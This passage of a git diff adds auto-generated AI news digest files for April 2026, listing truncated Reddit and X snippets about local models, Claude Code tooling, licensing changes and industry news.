Also worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i + +--- + +## [M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king](https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc.. Gemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i + +--- + +## [Last Week in Multimodal AI - Local Edition](https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week: * **Google Gemma 4** \- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine. [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4) * **TII Falcon Perception** \- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei + +--- + +## [@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech](https://x.com/omma_ai/status/2041622310503997632) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds. + +--- + +## [Review This Prompt And Feedback it.](https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/) +*Reddit r/ChatGPT* | 08/04/2026 | Score: 0.86 +Tags: api_update, cli_tool + +> ROLE You are an expert \[e.g. full-stack developer / product designer / ML engineer\] with deep experience in \[tech stack / domain\]. Your job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed. PROJECT Name: \[Project name\] Type: \[Web app / CLI tool / API / Dashboard / Bot / etc.\] One-liner: \[What it does in one sentence\] Target user: \[Who will use this\] GOAL Build a complete, working, production-ready \[project type\] that + +--- + +## [Reddit is broken! I proved it with Claude](https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.78 +Tags: api_update, developer_tool + +> Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma. **How I built it with Claude:** I used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. Claude also helped me wr + +--- + +## [I built an MCP that gives Claude Code its own servers to fix bugs in parallel](https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS "force quit" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other. So I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \~$0.03 + +--- + +## [Turbo-OCR for high-volume image and PDF processing](https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source + +> I recently had to process \~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed. The Problem: * PaddleOCR (the most popular open source OCR): Maxed out at \~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either. * VLM OCR (via vLLM): Great accuracy, but crawled at 2 im + +--- + diff --git a/data/digest-2026-04-09.md b/data/digest-2026-04-09.md new file mode 100644 index 0000000..c503e0c --- /dev/null +++ b/data/digest-2026-04-09.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-09** | 15 stories | Auto-generated from 616 archived stories + +--- + +## [Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It](https://x.com/ghumare64/status/2042234817358462986) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: open_source, developer_tool, agent_tool + +> Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental. + +--- + +## [OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mys + +--- + +## [OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mysel + +--- + +## [I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.](https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.86 +Tags: developer_tool, tool_update + +> So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town. Then I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two. Three pieces of perfect + +--- + +## [Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.](https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: api_update, tool_update + +> Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. The prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle + +--- + +## [I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects](https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: api_update, mcp + +> I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files. While building it, I started scanning my own projects with it. What I found was uncomfortable. In one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database. Across my last 5 projects, th + +--- + +## [your claude doesn't need a better memory, it needs a self-evolving knowledge base](https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> https://i.redd.it/57wdspbqc6ug1.gif Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers. I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes. The idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod + +--- + +## [Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?](https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/) +*Reddit r/ChatGPT* | 09/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> Honest question for people who actually use these models: The main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns. Now that they're closing up, the calculus changes: \- No local deployment \- API calls go to servers in China \- No way to verify what the model is actually doing Is this a dealbrea + +--- + +## [Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands](https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: cli_tool + +> I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \~10 approaches) https://i.redd.it/ferxmyorh7ug1.gif Bare model: \~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. All within noise of baseline, and self-critique was actively wors + +--- + +## [OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more](https://www.bbc.com/news/articles/clyd032ej70o) +*BBC AI* | Score: 1.00 +Tags: developer_tool + +--- + +## [I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled](https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> **TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**. Standard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**. So for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a + +--- + +## [LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence](https://x.com/LG_AI_Research) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need. + +--- + +## [Open-Source Models Can Do Everything Claude Mythos Can Do](https://x.com/stanislavfort) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: open_source + +> Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy. + +--- + +## [NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation](https://x.com/MattNiessner/status/2036019740930408905) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility. + +--- + +## [Unused phone as AI server](https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: api_update + +> If you have an unused phone lying around, you might be sitting on a tiny AI server I’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \[Gallery as Server\](https://github.com/xiaoyao9184/gallery) Your phone can run local AI inference You can call it just like an OpenAI API (chat/completions, etc.) Instead of letting that hardware collect dust, you can turn it into a lightweight inference node. So yeah—if you have more t + +--- + diff --git a/data/digest-2026-04-10.md b/data/digest-2026-04-10.md new file mode 100644 index 0000000..5985cad --- /dev/null +++ b/data/digest-2026-04-10.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-10** | 15 stories | Auto-generated from 178 archived stories + +--- + +## [Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore](https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/) +*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 +Tags: product_launch, developer_tool, tool_update, agent_tool + +> Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale. in the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev + +--- + +## [@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30](https://x.com/ArtificialAnlys/status/2042457674441482736) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance. + +--- + +## [Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions](https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: mcp, open_source + +> If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone. I built a system that fixes this. It's called Memoriki - a template that combines two open source projects: **Layer 1: LLM Wiki (Karpathy's pattern)** You drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w + +--- + +## [I no longer need a cloud LLM to do quick web research](https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: mcp + +> This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally. I use Qwen3.5:27B-Q3\_K\_M on an RTX 4090 with a context length of \~200,000. I get \~40 tk/s and use about 22gb VRAM. I use it through the llama.cpp Web UI, with MCP tools enabled. Here are the tools I have provided it for web search/scrape: """ webmcp - MC + +--- + +## [Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT](https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale](https://x.com/ainativedev/status/2031797311790260394) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale. + +--- + +## [@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For](https://x.com/hugobowne/status/2042464629214101663) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand. + +--- + +## [@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI](https://x.com/InfluxDB/status/2042388369674469612) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: tool_update + +> InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine. + +--- + +## [@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy](https://x.com/Techmeme/status/2042465278462955882) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: open_source + +> Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance. + +--- + +## [@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare](https://x.com/Berci/status/2042464294432858357) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: developer_tool + +> China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally. + +--- + +## [96GB Vram. What to run in 2026?](https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: product_launch + +> I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? + +--- + +## [making my own ai waifu app that can teach me any language.](https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: api_update + +> using gemma-4-E4B-it for the llm her voice is using omnivoice tts that i made the api using fastapi 3d model made by me using vroid studio right now is support uploading image, search web, and using voice call and video call like grok ani. i'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model. + +--- + +## [Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?](https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense. # The core Idea is : Instead of relying on a small model (\~2B params) to generate code from scratch (which is usually weak), the agent would 1. search GitHub for relevant code 2. use that as a reference 3. copy + adapt existing implementations 4. generate minimal edits instead of full solutions So the model acts mo + +--- + +## [is Agentic Commerce just the next buzzword for let’s automate your bank account?](https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> Just saw this TechNode article claiming "AI agents" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline. We can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have "agents" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare. Think about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp + +--- + +## [Started a video series on building an orchestration layer for LLM post-training [P]](https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/) +*Reddit r/MachineLearning* | 10/04/2026 | Score: 1.00 +Tags: developer_tool + +> Hi everyone! Context, motivation, a lot of yapping, feel free to skip to TL;DR. A while back I posted here asking [\[D\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. At first I wasn't trying to build anything new. I mostly wanted to understand veRL p + +--- + diff --git a/data/digest-2026-04-11.md b/data/digest-2026-04-11.md new file mode 100644 index 0000000..3c2ca0b --- /dev/null +++ b/data/digest-2026-04-11.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-11** | 15 stories | Auto-generated from 346 archived stories + +--- + +## [How I made my Claude multimodal — now I just feed it videos](https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Claude + Qwen API Figured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action. Now I just drop a video straight into Claude and get back what I need. Packaged it as a plugin for easy setup. github.com/kirillbrsnkv/give-claude-eyes + +--- + +## [How to get Claude to run more autonomously](https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Hi! Can someone tell me how to get Claude to work more autonomously on a large task? A bit of context: I have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings. The application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently. Super tedious for a human + +--- + +## [update on my ai waifu app, can use web search react to images even picture of herself](https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances) using SerpApi for the web search the tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api) my ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag + +--- + +## [I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki](https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> If you run multiple agent CLIs daily, you've probably hit the same pain points I have: 1. Too many terminal windows — impossible to find the one you need 2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse 3. Sharing files between agents means manually copying everything into the project folder I looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b + +--- + +## [I automated most of my job](https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/) +*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app. The workflow is super simple: 1. dotnet app calls our gitlab api for issues assigned to me 2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description 3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a + +--- + +## [I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it](https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.99 +Tags: api_update, cli_tool + +> Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago. So I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project. What it does fo + +--- + +## [I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out](https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.96 +Tags: open_source, cli_tool + +> Built with Claude Code, specifically for Claude Code users. Free, open source, MIT. What it does u/daik0z/claude-notify adds a Stop hook to \~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: "3 files edited · 2 commands ". npm install -g u/daik0z/claude-notify claude-notify setup What I learned from 374 downloads I sat down to stress-test it and foun + +--- + +## [ComfyUI workflow to fully python script?](https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 +Tags: api_update + +> Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python. Why? I'm planning to use a multi-GPU server and I want to optimize for that. What libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this? Also, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those? Thank you! + +--- + +## [Labs for Claude Certified Architect Foundations Exam](https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: tool_update + +> While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers. * Lab 01 - Customer Support Resolution Agent * Lab 02 - Code Generation Workflows * Lab 03 - Multi-Agent Research System * Lab 04 - Developer Productivity Agent * Lab 05 - CI/CD Integration * Lab 06 - Structured Data Extraction [https://github. + +--- + +## [FT - China’s Alibaba shifts towards revenue over open-source AI](https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: open_source + +> [https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t) Is it true? + +--- + +## [FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]](https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/) +*Reddit r/MachineLearning* | 11/04/2026 | Score: 1.00 +Tags: tool_update + +> I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch. The main goal is to make the progression across versions easier to understand from code. This is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details. + +--- + +## [I built a structured reasoning framework for Claude — because "good output" isn't enough](https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: developer_tool + +> **I built a structured reasoning framework for Claude — because "good output" isn't enough** I kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up. So I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled. The core idea: * Every complex task goes through a f + +--- + +## [Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)](https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: open_source + +> Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples. HuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal GitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/ MIT licensed. The repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and + +--- + +## [Gemma 4 - Going Mad - - - Help!!!](https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: cli_tool + +> Hi All Im getting up to speed on LLMs and we are looking at Gemma4. We are using a M3 Ultra with 512GB VRAM. So no dangers there. Im using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling. I have re-downloaded all the models this morning post the fixes. These are the unsloth ones. Im running llama.cpp - which i build on the server and is bang up to date. So in opencode CLI - if i give it this prompt - its runs + +--- + +## [Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)](https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: cli_tool + +> I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff. Tried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists. It includes: • local models (Ollama, Qwen, Llama etc) • free LLM APIs (OpenRouter, Groq, Gemini etc) • coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) • RAG stack tools (vector DBs, embeddings, frameworks) • agent frameworks and automati + +--- + diff --git a/data/digest-2026-04-12.md b/data/digest-2026-04-12.md new file mode 100644 index 0000000..00cfb87 --- /dev/null +++ b/data/digest-2026-04-12.md @@ -0,0 +1,83 @@ +# Stack Scout - AI News Digest +**2026-04-12** | 10 stories | Auto-generated from 109 archived stories + +--- + +## [JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.](https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/) +*Reddit r/ClaudeAI* | 12/04/2026 | Score: 1.00 +Tags: mcp, cli_tool, agent_tool + +> One instance is enough, but where is the fun in that right? 🤣 JARVIS across 3 servers, each running a different AI coding agent: \- 